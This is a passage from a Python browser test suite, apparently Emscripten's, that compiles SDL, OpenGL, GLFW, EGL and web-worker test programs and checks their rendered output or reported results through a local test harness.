shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
@requires_graphics_hardware
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def do_test_worker(self, args=[]):
# Test running in a web worker
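# main.html spawns worker.js and forwards the worker's message to the harness via /report_result; the
# build is run both with and without --preload-file to cover file preloading inside a worker.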
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.test_port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
assert os.path.exists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
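# A worker compiled with -s SMALL_XHR_CHUNKS=1 checksums /bigfile, which FS.createLazyFile backs with
# synchronous XHRs, and prints the result; the page relays that stdout line to /report_result, where it
# must match the adler32 checksum of the random data served by the local test server below.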
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.test_port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
run_process([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # mask to an unsigned 32-bit value so the result matches between Python 2 and 3
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.test_port))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid a race condition on cleanup: wait a bit so that processes have released their file locks and
# the test tearDown won't attempt to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(30, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else [])).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args,
timeout=30)
@requires_graphics_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'] + args)
def test_emscripten_api2(self):
def setup():
open('script1.js', 'w').write('''
Module._set(456);
''')
open('file1.txt', 'w').write('first')
open('file2.txt', 'w').write('second')
setup()
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
Popen([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'NO_EXIT_RUNTIME=0']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by the dEQP test suite (we can remove this later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_textures(self):
self.btest('gl_textures.cpp', '0', args=['-lGL'])
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_proc(self):
open('side.c', 'w').write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'SPLIT_MEMORY=16777216', '-s', 'WASM=0']) # check for uniform4fv slice being valid in split memory
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
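# pre.js disables SDL's copyOnLock default, and the three args-*.js pre-js files select the red, green
# and blue palettes via program arguments (-r, -g, -b), each compared against its own reference image.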
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
